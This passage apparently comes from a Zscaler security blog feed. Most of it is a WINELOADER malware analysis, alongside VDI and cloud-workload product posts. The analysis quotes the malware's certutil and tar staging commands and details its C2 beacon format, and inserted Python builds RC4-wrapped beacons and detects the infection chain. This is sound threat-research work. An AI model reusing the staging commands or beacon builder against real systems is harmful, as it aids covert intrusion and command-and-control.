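    "2024-01-29T09:01:30Z user=carol url=hxxps://us06webzoomus[.]pro/Zoom02.apk",
    "2024-01-29T09:05:00Z user=dave url=https://example.org/index.html",
]

if __name__ == "__main__":
    for url, verdict in scan_log(SAMPLE_LOG):
        print(verdict, url)
```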
Figure 6: DCRat Zscaler sandbox report

Figure 7: NjRAT Zscaler sandbox report

Zscaler's multilayered cloud security platform detected payloads with the following threat names:
- Win32.Backdoor.DCRat
- Win32.Backdoor.NjRat

MITRE ATT&CK Techniques

Enterprise Matrix

TACTIC | TECHNIQUE ID | TECHNIQUE NAME
Execution | T1064 | Scripting
Execution | T1059.001 | PowerShell
Persistence | T1547.001 | Registry Run Keys / Startup Folder
Privilege Escalation | T1547 | Boot or Logon Autostart Execution
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
Defense Evasion | T1064 | Scripting
Defense Evasion | T1027 | Obfuscated Files or Information
Defense Evasion | T1027.002 | Software Packing
Defense Evasion | T1070.004 | File Deletion
Defense Evasion | T1036 | Masquerading
Credential Access | T1056 | Input Capture
Credential Access | T1555 | Credentials from Password Stores
Discovery | T1124 | System Time Discovery
Discovery | T1083 | File and Directory Discovery
Discovery | T1082 | System Information Discovery
Discovery | T1518.001 | Security Software Discovery
Discovery | T1057 | Process Discovery
Discovery | T1010 | Application Window Discovery
Discovery | T1018 | Remote System Discovery
Discovery | T1016 | System Network Configuration Discovery
Discovery | T1120 | Peripheral Device Discovery
Collection | T1123 | Audio Capture
Collection | T1115 | Clipboard Data
Collection | T1056 | Input Capture
Collection | T1113 | Screen Capture
Collection | T1125 | Video Capture
Command and Control | T1219 | Remote Access Software
Command and Control | T1573 | Encrypted Channel
Command and Control | T1571 | Non-Standard Port
Command and Control | T1095 | Non-Application Layer Protocol
Command and Control | T1071 | Application Layer Protocol
Impact | T1498 | Network Denial of Service
Impact | T1529 | System Shutdown/Reboot

Mobile Matrix

TACTIC | TECHNIQUE ID | TECHNIQUE NAME
Persistence | T1624 | Event Triggered Execution: Broadcast Receivers
Persistence | T1444 | Masquerade as Legitimate Application
Privilege Escalation, Persistence | T1626 | Abuse Elevation Control Mechanism
Privilege Escalation, Persistence | T1546 | Event Triggered Execution
Collection | T1533 | Data from Local System
Collection | T1429 | Audio Capture
Collection | T1430 | Location Tracking
Collection | T1636 | Contact and SMS data

Tue, 05 Mar 2024 08:30:01 -0800 Himanshu Sharma

Positioning Zscaler Private Access Relative to VDI: Part 1

What are some of the most common concerns heard from customers about virtual desktop infrastructure (VDI)?
They are often related to cost, complexity, management, upkeep, and security. How can Zscaler solve these challenges? VDI is an undoubtedly complex environment, and having a clear picture of the organization's needs, and positioning the right solution to improve security, reduce complexity, and improve the user experience, is not always easy.

Zscaler Private Access (ZPA) has evolved in the past few years and become a direct replacement for VDI, whether on-premises or cloud-delivered. It is, however, not yet possible to map all the use cases supported by a VDI implementation and, in general, this is not a trivial task. Sometimes Zscaler can play a role by simply integrating solutions and providing the right level of security. To understand which role ZPA can play in replacing VDI, it is crucial to first understand why the customer is using a VDI.

Organisations leverage VDI for various reasons. The most common use cases are:

1. Access granularity – restrict users' access to only authorized applications
2. Traffic inspection – VDI as a choke point to run all traffic through on-premises security stacks
3. Data residency restriction
   a) Ensure data stays within corporate boundary and/or
   b) Ensure data is never stored on an end user's device
4. Traffic localization – minimize latency for heavyweight client-server interactions (e.g. database calls)
5. Desktop or software license management / reduction
   a) Clean desktop experience
   b) Persistent desktop that the user can access from multiple devices
   c) Software deployed to a limited pool of virtual desktops, rather than to all user devices
6. Legacy app support – enable access to apps that require an older OS

VDIs are expensive, cumbersome to manage, and often hinder user experience. But there is much more to think about: we are witnessing profound changes in the EUC (End User Computing) market.
Considering most applications are now web-based, you could potentially replace a VDI with isolated browser access and provide secure access to these web applications. Applications requiring access via protocols such as SSH and RDP can be easily addressed using Zscaler Privileged Remote Access (PRA). However, organisations probably still need to depend on VDIs in certain scenarios, such as applications requiring thick clients. In this case, they would be able to significantly reduce the size of their VDI deployment by using browser isolation.

Whenever Zscaler can't replace VDI, it can still be integrated. Zscaler can secure Internet/SaaS access of VDI instances, and additionally can protect access to VDI infrastructure. Whenever there is a VDI environment, ZIA and ZPA capabilities can play a role and improve the environment.

Major use cases in detail

1. Access granularity

This use case is fully supported and can be deployed by leveraging multiple capabilities of the Zscaler Zero Trust Exchange platform, like Browser Isolation. It allows you to leverage a web browser for user authentication and application access over ZPA, without requiring users to install Zscaler Client Connector on their devices. In certain cases, it might not be feasible or desirable to install Client Connector on all devices. For example, you might want to provide third-party access to applications on devices that might not be owned or managed by your company (e.g., contractor or partner-owned devices), or control user access to applications on devices with operating systems that are not currently supported by Zscaler Client Connector. Browser Isolation (BI) enhances the ZPA experience by making applications accessible to users from any web browser without requiring Zscaler Client Connector or browser plugins and configurations.
Additionally, the existing Identity Provider (IdP) can be used to provide access to current users, contractors, and other third-party users without managing an internet footprint. BI is a feature that addresses needs in both cyberthreat protection and data loss prevention and can be leveraged for both internet/SaaS apps and private apps. BI policies can dictate if a site should be run within isolation, and if so, whether you allow cut/paste and download capabilities for the user. An isolation container is instantiated for each user in the cloud and only pixels are transmitted to the user's browser. Sites may be isolated due to a configured URL category, cloud app control policy, or suspicious destinations (if Smart Browser Isolation is enabled).

Last, but not least, it is worthwhile mentioning the recent capabilities introduced by User Portal 2.0, which allow unmanaged devices to access SaaS and private web apps. With this feature enabled, unmanaged devices will be able to use the ZPA user portal to access both sanctioned SaaS/private web apps AND have their internet-facing traffic routed through ZIA while in Isolation mode. Organisations can provide access to sanctioned SaaS applications from unmanaged devices and enforce policies using the isolation policies defined on ZPA. The isolation containers that are created as a result of a ZPA Isolation Policy can forward non-ZPA-defined application traffic and generated internet traffic to ZIA for further processing and enforcement of the necessary policies. Any traffic generated for applications defined on ZPA will continue to be forwarded via ZPA's ZTNA service.

2. Traffic inspection

Although this use case is rare, traffic inspection is still fully supported, leveraging the inspection capability provided by the Zero Trust Exchange platform. We can use Zscaler Private Access (ZPA) AppProtection (formerly Inspection), which provides high-performance, inline security inspection of the entire application payload to expose threats.
It identifies and blocks known web security risks, such as the OWASP Top 10, and emerging zero-day vulnerabilities that can bypass traditional network security controls. It can help to protect internal applications from all types of attacks in the OWASP predefined controls, including SQL injection, cross-site scripting (XSS), and more. Additionally, it helps to understand the severity, description, and recommended default action for each type of attack related to OWASP predefined controls. Each OWASP predefined control is identified with a unique number, defining how the control operates, and is associated with a level of concern. The predefined controls are organized into various categories:

- Preprocessors
- Environment and Port Scanners
- Protocol Issues
- Request Smuggling or Response Split or Header Injection
- Local File Inclusion
- Remote File Inclusion
- Remote Code Execution
- PHP Injection
- Cross-Site Scripting (XSS)
- SQL Injection
- Session Fixation
- Deserialization Issues
- Anomalies

Additionally, Zscaler recently introduced support for inspecting ZPA application segment traffic. A predefined forwarding rule, ZIA Inspected ZPA Apps, is available on the Policy > Forwarding Control page to inspect the Microtunnel traffic of a ZPA application segment using ZIA. This rule is applied automatically to the traffic from ZPA application segments with the Inspect Traffic with ZIA field enabled in the ZPA Admin Portal. As part of this feature, a predefined Auto ZPA Gateway is available on the Administration > Zscaler Private Access Gateway page. This new gateway is the default for the predefined ZIA Inspected ZPA Apps forwarding rule.

We can minimize data exfiltration concerns with ZPA AppProtection by utilizing Cloud Browser Isolation (CBI), where unmanaged devices are prevented from downloading sensitive content to the local host. For corporately managed devices, organisations can leverage DLP with Source IP Anchoring (SIPA) utilizing the ZIA cloud.
AppProtection customers can craft custom signatures to detect and block bulk data downloads and use those in conjunction with other validation methods such as ZPA posture control. Organisations can rely on Zscaler Internet Access (ZIA) SSL Inspection best practices for configuring and deploying inspection in an organization's network environment, for example, while accessing SaaS applications.

Encrypting communications helps maintain the privacy and security of information passed between sender and receiver. Secure Sockets Layer (SSL) and its successor, Transport Layer Security (TLS), are protocols designed for the privacy and security of internet services. While these protocols do a great job of keeping information private from prying eyes, they also conceal threats to the user, device, and organization. This is where the inspection of SSL and TLS encrypted traffic becomes a necessity. Inspecting encrypted SSL and TLS traffic via SSL Inspection is done by the Zero Trust Exchange at scale, allowing organizations to control risk and enforce policy. Enabling SSL Inspection is a required first step towards:

- Controlling risk
- Inspecting traffic (malware, data loss)
- Adaptive control
- Enforcing policy
- Per-session policy decision and enforcement
- Allowing, blocking, and restricting tenant environments

Use cases 3 to 6 will be covered in part two of this series.

Fri, 01 Mar 2024 02:41:49 -0800 Stefano Alei

Securing Government Workload Communications in the Public Cloud

As government agencies continue their journey towards digital transformation, many are embracing hybrid cloud deployments to modernize their operations. A transition to a public or private cloud brings new challenges, especially when it comes to securing workload communications.
In this blog, we will delve into the reality of hybrid cloud deployments and explore how Zscaler's zero trust architecture provides a comprehensive solution for securing government workloads in the public cloud.

The Expanding Definition of Hybrid Cloud

Hybrid cloud deployments have become increasingly complex as agencies expand their infrastructure across multiple regions and clouds. Rather than relying on a single cloud or region, agencies leverage different regional clouds to ensure availability and scalability. Additionally, within a specific region, agencies may need to consider availability zones to ensure business continuity. Figure 1 illustrates scenarios of hybrid cloud deployments.

Workload Communications in the Public Cloud

To illustrate the challenges of workload communications, let's consider the example of a Department of Motor Vehicles (DMV) application deployed in the AWS GovCloud. This application needs to interact with other workloads or applications, such as a CRM or ERP system in the data center, to access driver records. It may also need to communicate with scheduling applications in different regions or clouds, and even access vehicle registration information stored in a different cloud provider such as Azure. Additionally, the DMV application may require software updates and send logs to the Google Cloud Platform.

Figure 2 shows

Legacy Architecture Challenges

Traditionally, agencies have extended their on-premises architecture to the cloud by deploying firewalls and VPNs. While this approach may provide initial security, it also amplifies lateral movement, increases cyberthreats, and exposes the infrastructure to data leaks. Moreover, deploying and managing multiple firewalls and VPNs across different cloud environments and regions adds complexity and operational costs.
Introducing Zscaler's Zero Trust Approach

Zscaler offers a cloud-delivered security platform based on zero trust principles to address the challenges faced by government agencies in securing workload communications. By adopting a zero trust proxy-based architecture, Zscaler eliminates the expanded attack surface and lateral movement risks associated with legacy architectures.

Connectivity and Security

Zscaler's platform provides both connectivity and security for workloads in the public cloud. It ensures secure connectivity by allowing access only to specific URLs or APIs, preventing open access to the internet. Workload-to-workload communications are based on least privileged access, ensuring that each workload can only communicate with authorized resources. Before any connection is established, zero trust-based authentication and authorization checks are performed, further enhancing security.

Threat Prevention and Data Protection

Zscaler's platform offers comprehensive threat prevention and data protection capabilities. It provides URL filtering, intrusion prevention, DNS protection, and behavior analysis, all backed by AI and ML-based risk analysis. Inline data protection ensures that sensitive data does not leak from workloads, with features such as regex-based checks, exact data management matching, OCR technology for file inspection, and AI/ML-based data classification.

TLS Decryption at Cloud Scale

With the increasing prevalence of encrypted traffic, TLS decryption at cloud scale becomes crucial. Zscaler's platform provides 100% inspection of traffic without compromising performance. This allows for effective threat prevention and data protection, ensuring the safety of data packets and preventing malicious intent.

Granular App-to-App Segmentation

Zscaler enables granular app-to-app segmentation, eliminating the need for expensive networking infrastructure or additional layers of segmentation software.
This ensures that workloads can only access authorized resources, providing an additional layer of security.

The Common Platform Advantage

Zscaler's platform offers a common platform for securing workloads across multiple clouds. By installing lightweight cloud connectors in different clouds, agencies can benefit from standardized and consolidated security operations. This approach simplifies security management, reduces operational complexity and costs, and ensures consistent security policies across multiple clouds. It stops external threats by protecting egress traffic from any malicious payload. It protects against insider threats by eliminating the threat of a bad actor within the agency who has the credentials to inflict harm, either by inserting a malicious payload or by exfiltrating sensitive data. The Zero Trust Exchange is designed to eliminate lateral movement and reduce the attack surface significantly. Moreover, Zscaler's platform is both FedRAMP and StateRAMP Authorized and GovCloud ready.

For more information on Zscaler Workload Communications:

- Download the Datasheet
- Watch the Webinar: Ensuring Cloud Workload Security for Federal and State Government
- Request a Test Drive in AWS

Wed, 28 Feb 2024 05:05:01 -0800 Sakthi Chandra

European diplomats targeted by SPIKEDWINE with WINELOADER

Introduction

Zscaler's ThreatLabz discovered a suspicious PDF file uploaded to VirusTotal from Latvia on January 30th, 2024. This PDF file is masqueraded as an invitation letter from the Ambassador of India, inviting diplomats to a wine-tasting event in February 2024. The PDF also included a link to a fake questionnaire that redirects users to a malicious ZIP archive hosted on a compromised site, initiating the infection chain. Further threat hunting led us to the discovery of another similar PDF file uploaded to VirusTotal from Latvia in July 2023.

This blog provides detailed information about a previously undocumented backdoor we named ‘WINELOADER’.
We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack. The attack is characterized by its very low volume and the advanced tactics, techniques, and procedures (TTPs) employed in the malware and command and control (C2) infrastructure. While we have not yet attributed this attack to any known APT group, we have named this threat actor SPIKEDWINE based on the wine-related theme and filenames used in different stages of the attack chain, and our investigation into the case is ongoing.

Key Takeaways

- Low-volume targeted attack: The samples intentionally targeted officials from countries with Indian diplomatic missions, although VirusTotal submissions indicate a specific focus on European diplomats.
- New modular backdoor: WINELOADER has a modular design, with encrypted modules downloaded from the command and control (C2) server.
- Evasive tactics: The backdoor employs techniques, including re-encryption and zeroing out memory buffers, to guard sensitive data in memory and evade memory forensics solutions.
- Compromised infrastructure: The threat actor utilized compromised websites at multiple stages of the attack chain.

Attack Chain

Figure 1 below illustrates the multi-stage attack chain at a high level.

Figure 1: Multi-stage attack chain of WINELOADER.

Technical Analysis

In this section, we provide a detailed analysis of each component of the attack chain initiated when a victim receives and clicks on the link within the PDF.

PDF analysis

The PDF file is a fake invitation to a wine-tasting event purported to take place at the Indian ambassador’s residence on February 2nd, 2024. The contents are well-crafted to impersonate the Ambassador of India.
The invitation contains a link to a fake questionnaire, which kickstarts the infection chain. The malicious link in the PDF invitation redirects users to a compromised site, hxxps://seeceafcleaners[.]co[.]uk/wine.php, that proceeds to download a ZIP archive containing an HTA file, wine.hta. Figure 2 below shows the contents of the PDF file.

Figure 2: The PDF invitation showcasing the malicious link.

A quick analysis of the PDF file's metadata reveals that it was generated using LibreOffice version 6.4, and the time of creation was January 29th, 2024, at 10:38 AM UTC.

HTA file analysis

The HTA file downloaded in the previous section contains obfuscated JavaScript code, which executes the next stage of malicious activities. The obfuscation technique used in the code exhibits patterns that match those of a publicly available obfuscator. Figure 3 below shows a preview of the code inside the HTA file. Decoy content is displayed to the victim to disguise malicious activity. This content is similar to what was displayed in the original PDF (Figure 2 above) and includes information about the wine-tasting event in February 2024.

Figure 3: Obfuscated JavaScript code inside the HTA file.

The HTA file performs the following key functions:

- Downloads a Base64 encoded text file from the URL: seeceafcleaners[.]co[.]uk/cert.php
- Saves the text file to the path: C:\Windows\Tasks\text.txt
- Uses certutil.exe to Base64 decode the text file and write the result to a ZIP archive under C:\Windows\Tasks\. The command used is: certutil -decode C:\Windows\Tasks\text.txt C:\Windows\Tasks\text.zip
- Extracts the contents of the ZIP archive to the path: C:\Windows\Tasks\. The command used is: tar -xf C:\Windows\Tasks\ -C C:\Windows\Tasks\. The ZIP archive contains two files named sqlwriter.exe and vcruntime140.dll. Here, sqlwriter.exe is the legitimate binary signed by Microsoft and vcruntime140.dll is the malicious DLL crafted by the attacker, which will be side-loaded automatically when sqlwriter.exe is executed. Per our research, sqlwriter.exe has never been abused in the wild by any threat actor for DLL side-loading (at least to the best of our knowledge). This implies that the threat actor in this case put in extra effort to identify a signed Microsoft executable vulnerable to DLL side-loading.
- Executes sqlwriter.exe from the path C:\Windows\Tasks\, which will kick-start the infection chain.

WINELOADER binary analysis

When sqlwriter.exe executes, it loads a malicious DLL named vcruntime140.dll from the same directory using DLL side-loading. The exported function set_se_translator is then executed. This function decrypts the embedded WINELOADER core module within the DLL using a hardcoded 256-byte RC4 key before executing it. This is shown in the screenshot below.

Figure 4: Code section that decrypts and executes the WINELOADER core module.

Each module consists of configuration data (e.g., C2 polling interval), an RC4 key, and encrypted strings, followed by the module code. Part of the decrypted WINELOADER core module is shown in Figure 5 below.

Figure 5: Data structure containing relevant configuration, RC4 key, encrypted strings, and the module.

WINELOADER employs the following techniques to evade detection:

- Sensitive data is encrypted with a hardcoded 256-byte RC4 key. The sensitive data includes:
  - The core module and subsequent modules downloaded from the C2 server
  - Strings (e.g., DLL filenames and API import function names)
  - Data sent and received from the C2 server
- Some strings are decrypted on use and re-encrypted shortly after.
- Memory buffers for storing results from API calls or decrypted strings are zeroed after use.
- DLL hollowing is then used to inject WINELOADER into a randomly selected DLL from the Windows system directory.
The implementation is similar to the one presented by SECFORCE in their blog. WINELOADER includes additional randomization code to ensure that different DLLs are chosen for each instance of DLL hollowing (see Figure 6).

Figure 6: The randomization code used when selecting a Windows system DLL for DLL hollowing.

WINELOADER is not injected into the following DLLs as they contain exported functions used by the malware:

- advapi32.dll
- api-ms-win-crt-math-l1-1-0.dll
- api-ms-win-crt-stdio-l1-1-0.dll
- bcryptprimitives.dll
- iphlpapi.dll
- kernel32.dll
- kernelbase.dll
- mscoree.dll
- ntdll.dll
- ole32.dll
- rpcrt4.dll
- shlwapi.dll
- user32.dll
- wininet.dll

WINELOADER will inject itself into another randomly selected DLL again via DLL hollowing before it sends the first beacon request to the C2 server.

The beacon request is an HTTP GET request containing a request body, which is unusual for GET requests. All requests to the C2 server use the same User-Agent, Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1, hardcoded into the sample itself. The body of the HTTP GET request is encrypted with the same 256-byte RC4 key and the fields are as follows. We have appended a question mark to fields that we are unable to conclusively verify due to the limited data collected.
This information is available in the table below.

Offset | Length | Name | Description
0x0 | 2 | Length of padding bytes (n) | This value is randomized (min: 255, max: 65535), stored in little-endian (LE).
0x2 | n | Padding bytes | Padding bytes are randomly generated with the ProcessPrng API.
0x2 + n | 8 | Campaign ID? | 5F D5 97 93 ED 26 CB 5A in the analyzed sample.
0xa + n | 8 | Session ID? | Randomly generated on execution.
0x12 + n | 8 | Local IP address | The local IP address of the infected machine.
0x20 + n | 512 | Parent process name | In Unicode
0x220 + n | 512 | User name | In Unicode
0x420 + n | 30 | Machine name | In Unicode
0x43e + n | 4 | Parent process ID | In little-endian
0x442 + n | 1 | Parent process token elevation type | Information about the privileges of the token linked to the parent process.
0x443 + n | 8 | Polling interval for C2 requests | C0 D4 01 00 00 00 00 00 in the analyzed sample, translates to 120,000 ms or 2 mins between requests.
0x44b + n | 1 | Request type? | 1 for beacon, 2 for status update
0x44c + n | 8 | Length of message | In little-endian. 0 for beacon requests
0x454 + n | 8 | Unknown? | Observed to match the value of the request type field.
0x45c + n | 8 | Module ID? | 00 00 00 00 00 00 00 for the core module and 6B 19 A8 D2 69 2E 85 64 for the persistence module.
0x464 + n | Varies | Message | Only observed for type 2 requests.

Table 1: WINELOADER C2 beacon request fields

An example beacon request is shown below. The value of the Content-Length header varies across requests, as the padding length is randomized with a minimum of 1,381 bytes.

GET /api.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.1) Gecko/20100101 Firefox/86.1
Host:
Content-Length: 54674

[54,674 bytes of binary data in the request body (not shown here)]

The same RC4 key is then used to decrypt the response from the C2 server.
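For analysts working from a decrypted capture, the Table 1 layout above can be turned into a parser. The following Python is an added example and not ThreatLabz tooling: it builds a beacon in the documented layout from constructed values, RC4-encrypts it with a PLACEHOLDER key (the key embedded in the sample is not reproduced here), then decrypts and parses it back. Session ID, local IP, user and machine names, parent PID and token type are constructed; the campaign ID, polling interval, request type and module ID are the values given in the analysis. One assumption worth noting: the local IP field is read as 14 bytes, because Table 1 places the next field at 0x20 + n even though the length column says 8.

```python
"""Build, RC4-wrap and parse a WINELOADER-style C2 beacon (Table 1 layout).

Added example, not ThreatLabz code. The RC4 key below is a PLACEHOLDER,
not the key embedded in the malware.
"""
import secrets
import struct

PLACEHOLDER_KEY = bytes(range(256))  # placeholder, NOT the real key

# Values given in the analysis.
CAMPAIGN_ID = bytes.fromhex("5FD59793ED26CB5A")
CORE_MODULE_ID = bytes(8)
POLL_MS = 120_000  # C0 D4 01 00 00 00 00 00 little-endian

# Fixed part after the padding: offsets 0x2+n .. 0x464+n of Table 1.
# Local IP is taken as 14 bytes (0x12+n .. 0x20+n); see lead-in.
BEACON = struct.Struct("<8s8s14s512s512s30sIBQBQQ8s")
assert BEACON.size == 0x462


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _utf16(text: str, size: int) -> bytes:
    """NUL-padded UTF-16LE field of a fixed size ("In Unicode" in Table 1)."""
    return text.encode("utf-16-le").ljust(size, b"\x00")


def _str16(raw: bytes) -> str:
    return raw.decode("utf-16-le").rstrip("\x00")


def build_beacon(padding_len=300, request_type=1, message=b"",
                 parent="sqlwriter.exe", user="victim", machine="WS01",
                 local_ip=b"\x0a\x00\x00\x05".ljust(14, b"\x00")) -> bytes:
    """Plaintext beacon (before RC4); all non-documented values constructed."""
    header = BEACON.pack(
        CAMPAIGN_ID, secrets.token_bytes(8), local_ip,
        _utf16(parent, 512), _utf16(user, 512), _utf16(machine, 30),
        4242,            # parent PID (constructed)
        1,               # token elevation type (constructed)
        POLL_MS, request_type, len(message),
        request_type,    # "Unknown?" field, observed to match request type
        CORE_MODULE_ID)
    return (padding_len.to_bytes(2, "little")
            + secrets.token_bytes(padding_len) + header + message)


def parse_beacon(plain: bytes) -> dict:
    """Parse a decrypted beacon; raises ValueError instead of misreading."""
    if len(plain) < 2:
        raise ValueError("beacon shorter than its length field")
    n = int.from_bytes(plain[:2], "little")
    body = plain[2 + n:]
    if len(body) < BEACON.size:
        raise ValueError("beacon truncated after padding")
    (campaign, session, ip, parent, user, machine, ppid, elev, poll,
     rtype, msg_len, unknown, module) = BEACON.unpack_from(body)
    message = body[BEACON.size:BEACON.size + msg_len]
    if len(message) != msg_len:
        raise ValueError("message shorter than its declared length")
    return {
        "padding_len": n,
        "campaign_id": campaign.hex(),
        "session_id": session.hex(),
        "local_ip_raw": ip.hex(),
        "parent_process": _str16(parent),
        "user_name": _str16(user),
        "machine_name": _str16(machine),
        "parent_pid": ppid,
        "token_elevation": elev,
        "polling_interval_ms": poll,
        "request_type": rtype,
        "unknown": unknown,
        "module_id": module.hex(),
        "message": message,
    }


if __name__ == "__main__":
    wire = rc4(PLACEHOLDER_KEY, build_beacon())
    print(parse_beacon(rc4(PLACEHOLDER_KEY, wire)))
```

Against a real capture, the body of the GET request would be decrypted with the key recovered from the sample and then handed to parse_beacon; the explicit length checks mean a partial capture is reported as an error rather than silently parsed into wrong fields.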
The fields for the decrypted response are shown in the table below.

Offset | Length | Name | Description
0x0 | 2 | Length of padding bytes (n) | This value is stored in little-endian (LE).
0x2 | n | Padding bytes | Unused bytes
0x2 + n | 8 | Campaign ID? | 5F D5 97 93 ED 26 CB 5A in the analyzed sample
0xa + n | 1 | Command | Command from C2
0xb + n | Varies | Command data | Binary data for command

Table 2: WINELOADER C2 response fields

The core module supports three commands:

- Execute modules from the C2 either synchronously or asynchronously (via CreateThread)
- Inject itself into another DLL
- Update the sleep interval between beacon requests

During our research, we obtained a persistence module from the C2 server. This module copies sqlwriter.exe and vcruntime.dll into the C:\Windows\Tasks directory and creates a scheduled task named MS SQL Writer with the description SQL Server VSS Writer 64-bit to execute C:\Windows\Tasks\sqlwriter.exe daily. The persistence module offers an alternative configuration to establish registry persistence at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer. After establishing persistence for WINELOADER, the module sends an HTTP POST request to notify the C2 server about the completed task. The request body mirrors the structure of the beacon request.

Command And Control Infrastructure

The threat actor leveraged compromised network infrastructure at all stages of the attack chain. We identified three compromised websites used for hosting intermediate payloads or as C2 servers. Based on our in-depth analysis of the C2 communication, we believe the C2 server only responds to specific types of requests at certain times. This measure prevents automated analysis solutions from retrieving C2 responses and modular payloads.

Conclusion

The threat discussed in this blog demonstrated advanced tactics, techniques, and procedures (TTPs), displaying a keen interest in exploiting the diplomatic relations between India and Europe.
The threat actor put additional effort into remaining undetected by evading memory forensics and automated URL scanning solutions. While we cannot currently attribute this activity to any known nation-state threat actor, we continue to monitor any new developments associated with this threat actor and ensure the necessary protections for our customers against these threats.

Zscaler Coverage

Figure 7: Zscaler sandbox detection report

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to WINELOADER at various levels with the following threat names:

- Win64.Downloader.WineLoader

Indicators Of Compromise (IOCs)

SHA256 | Description
72b92683052e0c813890caf7b4f8bfd331a8b2afc324dd545d46138f677178c4 | vcruntime140.dll (WINELOADER core module loader)
ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7 | wine.pdf (July 2023 invitation)
3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9 | wine.pdf (Feb 2024 invitation)
1c7593078f69f642b3442dc558cddff4347334ed7c96cd096367afd08dca67bc | wine.hta
e477f52a5f67830d81cf417434991fe088bfec21984514a5ee22c1bcffe1f2bc | WINELOADER core module
f61cee951b7024fca048175ca0606bfd550437f5ba2824c50d10bef8fb54ca45 | WINELOADER core module (RC4-encrypted)
c1223aa67a72e6c4a9a61bf3733b68bfbe08add41b73ad133a7c640ba265a19e | WINELOADER persistence module loader
b014cdff3ac877bdd329ca0c02bdd604817e7af36ad82f912132c50355af0920 | WINELOADER persistence module
7600d4bb4e159b38408cb4f3a4fa19a5526eec0051c8c508ef1045f75b0f6083 | WINELOADER persistence module (RC4-encrypted)

URL | Description
hxxps://castechtools[.]com/api.php | WINELOADER C2
hxxps://seeceafcleaners[.]co[.]uk/cert.php | Downloads base64-encoded ZIP archive from this URL.
hxxps://seeceafcleaners[.]co[.]uk/wine.php | Downloads the ZIP archive containing the wine.hta file.
hxxps://passatempobasico[.]com[.]br/wine.php | Downloads the ZIP archive containing the wine.hta file (IOC from July 2023).
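The delivery chain and persistence described above (mshta launching the HTA, certutil decoding into C:\Windows\Tasks, tar extracting there, sqlwriter.exe running from that directory, the MS SQL Writer scheduled task and the Run key) can be expressed as host-based detection logic. The following Python is an added example, not ThreatLabz code or a Zscaler signature. It runs over constructed JSON-lines telemetry with a simplified schema assumed by this example (process, task_created and registry_set records); real sources such as Sysmon or Windows security events carry the same fields under other names.

```python
"""Stage-by-stage detection of the WINELOADER delivery and persistence chain.

Added example (not ThreatLabz tooling). Telemetry schema is an assumption:
every record has "host" and "type"; "process" records carry "pid", "ppid",
"image", "cmdline"; "task_created" records carry "name" and "action";
"registry_set" records carry "key", "value" and "data".
"""
import json
import re

TASKS_DIR = "c:\\windows\\tasks\\"
TASKS_RE = re.compile(re.escape(TASKS_DIR), re.I)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run$", re.I)

# Constructed sample telemetry: WS01 reproduces the chain, WS02 is benign noise.
SAMPLE_TELEMETRY = "\n".join([
    r'{"host":"WS01","type":"process","pid":1001,"ppid":800,"image":"C:\\Windows\\System32\\mshta.exe","cmdline":"mshta.exe C:\\Users\\victim\\Downloads\\wine.hta"}',
    r'{"host":"WS01","type":"process","pid":1002,"ppid":1001,"image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil -decode C:\\Windows\\Tasks\\text.txt C:\\Windows\\Tasks\\text.zip"}',
    r'{"host":"WS01","type":"process","pid":1003,"ppid":1001,"image":"C:\\Windows\\System32\\tar.exe","cmdline":"tar -xf C:\\Windows\\Tasks\\text.zip -C C:\\Windows\\Tasks\\"}',
    r'{"host":"WS01","type":"process","pid":1004,"ppid":1001,"image":"C:\\Windows\\Tasks\\sqlwriter.exe","cmdline":"C:\\Windows\\Tasks\\sqlwriter.exe"}',
    r'{"host":"WS01","type":"task_created","name":"MS SQL Writer","action":"C:\\Windows\\Tasks\\sqlwriter.exe"}',
    r'{"host":"WS01","type":"registry_set","key":"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","value":"MS SQL Writer","data":"C:\\Windows\\Tasks\\sqlwriter.exe"}',
    r'{"host":"WS02","type":"process","pid":2001,"ppid":700,"image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil -verify C:\\Temp\\cert.cer"}',
    r'{"host":"WS02","type":"task_created","name":"Nightly Backup","action":"C:\\Program Files\\Backup\\run.exe"}',
])


def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_runs_hta(r):
    return r["type"] == "process" and _base(r["image"]) == "mshta.exe" \
        and ".hta" in r["cmdline"].lower()


def certutil_decode_to_tasks(r):
    return r["type"] == "process" and _base(r["image"]) == "certutil.exe" \
        and "-decode" in r["cmdline"].lower() and bool(TASKS_RE.search(r["cmdline"]))


def tar_extract_to_tasks(r):
    return r["type"] == "process" and _base(r["image"]) == "tar.exe" \
        and "-xf" in r["cmdline"].lower() and bool(TASKS_RE.search(r["cmdline"]))


def exe_run_from_tasks(r):
    # C:\Windows\Tasks is a writable path no legitimate service binary runs from.
    return r["type"] == "process" and r["image"].lower().startswith(TASKS_DIR)


def task_persists_from_tasks(r):
    return r["type"] == "task_created" and (
        r["name"].lower() == "ms sql writer" or bool(TASKS_RE.search(r["action"])))


def run_key_points_to_tasks(r):
    return r["type"] == "registry_set" and bool(RUN_KEY_RE.search(r["key"])) and (
        r["value"].lower() == "ms sql writer" or bool(TASKS_RE.search(r["data"])))


RULES = [mshta_runs_hta, certutil_decode_to_tasks, tar_extract_to_tasks,
         exe_run_from_tasks, task_persists_from_tasks, run_key_points_to_tasks]


def parse_telemetry(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(records) -> list:
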